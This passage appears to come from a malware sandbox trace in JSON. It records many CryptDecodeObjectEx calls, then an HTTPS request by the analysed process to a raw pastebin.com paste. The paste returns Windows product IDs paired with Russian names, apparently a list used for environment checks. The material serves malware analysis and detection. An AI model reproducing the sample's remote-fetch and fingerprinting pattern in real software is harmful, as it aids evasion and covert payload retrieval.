            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1927
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1928
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1929
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0@\\x02\\x01\\x00\\x02\\x01\\x010806\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1930
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0806\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1931
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1932
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0@\\x02\\x01\\x00\\x02\\x01\\x010806\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1933
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0806\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1934
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x02\\x87v\\xeb\\x1e}\\xaeb\\xa5+\\xd5\n\\xa1[\\x9a]\\x04 \\x05\\xbe\\xf6\\xeb\\xdd\\xa8\\x0f=\\x15\\x07>K\\xde\\x9e\\x9f\\x9d\\xaau\\xf0\\xa5\\xa7p:c\\xaca<\\xf4>\\x14\\x08\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1935
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x08\\x02\\x01\\x00\\x02\\x01\\x010\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1936
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1937
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7da2",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\x1a\\x02\\x01\\x00\\x02\\x01\\x010\\x82\\x03\\x1006\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1938
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7e31",
            "parentcaller": "0x7ffee0bc7c77",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03\\x1006\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x0006\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x0006\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x0006\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x0006\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1939
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10V\\x8f\\x1c\\xb8\\xa3\t\\xda\\x17\\xf1\\x15\\x02\\xff\n\\xebp\\x80\\x04 \re(Gp#\\xc1o\\xb1\\x1e\\xe6\\xc3ZRPLND\\x1bY\\x19I\\x1f_5\\x9e\\xd5\\x0e\\xb3\\x05\\x9b\\x8a\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1940
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10h\\xcbB\\xb05\\xeaw>R\\xefP\\xec\\xf5\\x0e\\xc5)\\x04 \\xa6\\x7f\\xe2\\xa9\\xaf\\x96|\\xb5\\xbf\\xfd\\xc9\\xeb\\xda\\x8f\\x1a\\xb5\\xea\\xbc\\xa2T\\xf1\\x03\\x96Rw\\xfdK\\xa3>'\\xa1\\x87\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1941
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x04 \\xd4\\xc6z\\xd5\\x0e\\x19;\\x9du\\xa2!\\xd2`3\t\\x17\\x15t\\xaex,f\\xdb\\xa6D\\xa6\\x8a\\xffu\\xc0\\x7fP\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1942
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x91\\xfa\\xd4\\x83\\xf1HH\\xa8\\xa6\\x9b\\x18\\xb8\\x05\\xcd\\xbb:\\x04 \\x064\\x8c\\xa9\r\\x7f\\xe0\\xf9\\x0cv\\xab\\x9d\\xe8\"\\xab\\xf5{\\x9a\\xb4B*\\xb4\\xf8>\\x9b\\x86\\x83\\xacQ\\xdf7\\x95\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1943
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\x98;\\x13&5\\xb7\\xe9\\x1d\\xee\\xf5Jg\\x80\\xc0\\x92i\\x04 `\\xbd\\xedu\\xc5\\xfd\\x11\\x90\\x10\\xd6\\x83/v\\xde\\xfc94s\\xd7\\xa0\\xced\\xfb\\xd6\\x8d\\xab\\xa2\\x9b\\xfd\\x0b/|\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1944
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xa8#\\xb4\\xa2\\x01\\x80\\xbe\\xb4`\\xca\\xb9U\\xc2M~!\\x04 =\\xde2\\xff\\xc4p\\x9b\\xb1\\xa3\\xffv\\xd3TA\\xf4\\xae\\x7f\\xe0^\\xe2\\x8a\\xe5\\xd6\\x17\\xa7[\\xd3n\\xeek\\xf5\\xca\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1945
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xa8\\x82z<\\xbd-\\x87\\xd7\\x83\\xb5\\x9b\\x80b\\xc8~\\x9a\\x04 %\\x88%;\\x9aAR$\\x14\\xad\\xc3\\xab\\xa2\\xf0\\xb8\\x17\\xbf;\\xaa\\x0cz\\x0c\\x19diO\\x7f^\\xff\\xc4\\xb9`\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1946
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xadmo\\xf3\\x1b$\\x011Q\\xf2y\\xe2j\\x8c3$\\x04 \\xd61\\xb2F\\x02|\\xa8\\x8e\\x9b\\x03BO#\\x0c\\x9f53R\\xb4\\x9a_\\x9as\\x15Vm\\xc2\\xach\\xd0X\\x16\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1947
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbaO9r\\xe7\\xae\\xd9\\xdc\\xcd\\xc2\\x10\\xdbY\\xda\\x13\\xc9\\x04 \\xe5\\xd4\\x7f\\x02\\xf2t\\x97\\x81\\xc1\\x84\\xab<\\x0fT\\x9eqk\\xb21BJr\\x1f\\xec;\\xdf\\xa17G\\x9e\\x1e\\x15\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1948
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xbb\\x04\\x8f\\x1889_o\\xc3\\xa1\\xf3\\xd2\\xb7\\xe9vT\\x04 J\\xbb\\x05\\x94\\xd3\\x03\\xefpw\\x13\\x884\\xab1^\\x94\\x1e\\x960\\x93\\xe0[K\\x14\\xaf]\\xcbRw\\x12\\xc0\n\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1949
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd0\\xfd<\\x9c8\r{e\\xe2k\\x9a?\\xed\\xd3\\x9b\\x8f\\x04 9\\xa4u\\x87\\x0b\\xf2\\xb4\\x8cR\\x03\\xa0\\x8e\\xa5\"y\\xbc\\xe7\\x1a\\xbb\\x8d>7\\xe0k\\x89\\x07\\xa2g\\xec\\xd7\\xdaj\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1950
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd6`0\\xcd\\xb7\\x92\\x86\\xc9\\xcb\\xee\\x93\\xc1O\\xa3\\x99\\xcc\\x04 E\\xbaB\\xfe\\xb2v\\x9a\\x95c\\xfaQ\\xcc'\\xdd\\x14\\x96\\xef\\xd0\\xe4\\xc5\\xd1\\x96\\x89\\x803\\x17\\x8c\\xc8u\\x8fP\\xca\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1951
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xd8\\xb5\\xfb6\\x84hb\\x02u\\xd1B\\xff\\xd2\\xaa\\xde7\\x04 p\\x8f\\x94en\\xadw\\x16k\\xe938[7\\xb7\\xd5\\x8f\\x7f\\x10\\xb2\\x8c\\x12ld\\xa7\\x86\\x1b\\xc6k\\xb6g\\xc4\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1952
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7f0a",
            "parentcaller": "0x7ffee0bc7e76",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00010001"
              },
              {
                "name": "Encoded",
                "value": "06\\x04\\x10\\xfaF\\xce|\\xbb\\x85\\xcf\\xb41\\x00u1:\t\\xee\\x05\\x04 H\\xa0:\\xf5\\x0b\\xc5\\xa1\\xf9q\\xc0\\xc1\\x93\\x8b\n\\xb2\\xd5\\x9bT\\x86\\x9e\\x18\\x01\\xf3x\\x1d^\\x1c\\xd2\\xf7\\xe3\\x93\\x91\\x05\\x00"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1953
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bc7cee",
            "parentcaller": "0x7ffee0bca060",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "\\x17\r180601232859Z"
              },
              {
                "name": "Flags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 1954
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffec77a116b",
            "parentcaller": "0x7ffec77a0c67",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1955
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffedfaad443",
            "parentcaller": "0x7ffedfaabd57",
            "category": "network",
            "api": "SslEncryptPacket",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Buffer",
                "value": "GET /raw/04TKQkE1 HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pastebin.com\r\n\r\n"
              },
              {
                "name": "SequenceNumber",
                "value": "1"
              },
              {
                "name": "BufferSize",
                "value": "158"
              }
            ],
            "repeated": 0,
            "id": 1956
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffec77be76b",
            "parentcaller": "0x7ffec779d7bf",
            "category": "network",
            "api": "WSASend",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Socket",
                "value": "1192"
              },
              {
                "name": "Buffer",
                "value": "\\x17\\x03\\x03\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xa1\\xab\\xf0\\x85\\xd3\\xfd\\xa7h\\xca2}\\xda\\x8c\\x85\\x87\\x14\\xa1G?\\x0e\\xda\\xae\\xcd(\\xa6\\xd1\\x9e\\xc0\\x0b\\x1b\\x98u\\xae\\xb1\\xa91J\\xc1L\\x01P\\x1c\\xf0V\\x7ff\\x14)\\xcb\\xadH\\xdf?\\\\xde\\xb3\\xac&\\xfaV\\x99g\\xc6\\xeaS\\xff\\xa7\\x1a\\xac\\xfe\\xf7z,\\x92\\x7f\\x01\\xc6\\xe7[\\x17\\xbe\\x90\\xa3+\\xfd\\xa1f\\x18\\xca\\x1b\\xdc\\xed9\\xd2>\\x9eo\\x00\\x86\\x04\\xea\\xae\\x91\\xe0B4\\xf4\\x85\\x83\\x8f-\\xdch\\xf2\\xbb\\xd2\\x0c\\xa392\\x17\\x8abv\\xd6n_\\x16Wc\\x8cz\\x9a\\xf1:\\xa4Md\\x1c5\\xa2\\xcb\\xe1(\\xf9\\x9a\\x8f;R\\x9a.cP|\\x02\\xd7\\x1f\\xd0\\x1a\\x15nG\\xc7\\xd2\\x0f\\xf1\\x8e?\\xf1Y\\xb2\\x02 \\xbc"
              }
            ],
            "repeated": 0,
            "id": 1957
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffec77bb648",
            "parentcaller": "0x7ffec779c7cd",
            "category": "network",
            "api": "WSARecv",
            "status": false,
            "return": "0xffffffffffffffff",
            "arguments": [
              {
                "name": "socket",
                "value": "1192"
              }
            ],
            "repeated": 0,
            "id": 1958
          },
          {
            "timestamp": "2025-11-20 10:58:35,594",
            "thread_id": "1596",
            "caller": "0x7ffedfaacb7e",
            "parentcaller": "0x7ffedfaac903",
            "category": "network",
            "api": "SslDecryptPacket",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Buffer",
                "value": "HTTP/1.1 200 OK\r\nDate: Thu, 20 Nov 2025 13:58:43 GMT\r\nContent-Type: text/plain; charset=utf-8\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nServer: cloudflare\r\nx-frame-options: DENY\r\nx-content-type-options: nosniff\r\nx-xss-protection: 1;mode=block\r\nCache-Control: public, max-age=14400\r\ncf-cache-status: EXPIRED\r\nlast-modified: Thu, 20 Nov 2025 13:58:43 GMT\r\nVary: accept-encoding\r\nCF-RAY: 9a1876ba4d1c6cde-ARN\r\n\r\n90\r\n00330-80000-00000-AA481 - \\x44f\r\n00326-30000-00001-AA465 - \\x412\\x43b\\x430\\x434\r\n00330-80000-00000-AA051 - \\x42d\\x43b\\x44c\\x434\\x430\\x440\r\n00326-30000-00001-AA817 - \\x41a\\x438\\x440\\x438\\x43b\\x43b\r\n"
              },
              {
                "name": "SequenceNumber",
                "value": "1"
              },
              {
                "name": "BufferSize",
                "value": "570"
              }
            ],
            "repeated": 0,
            "id": 1959
          },
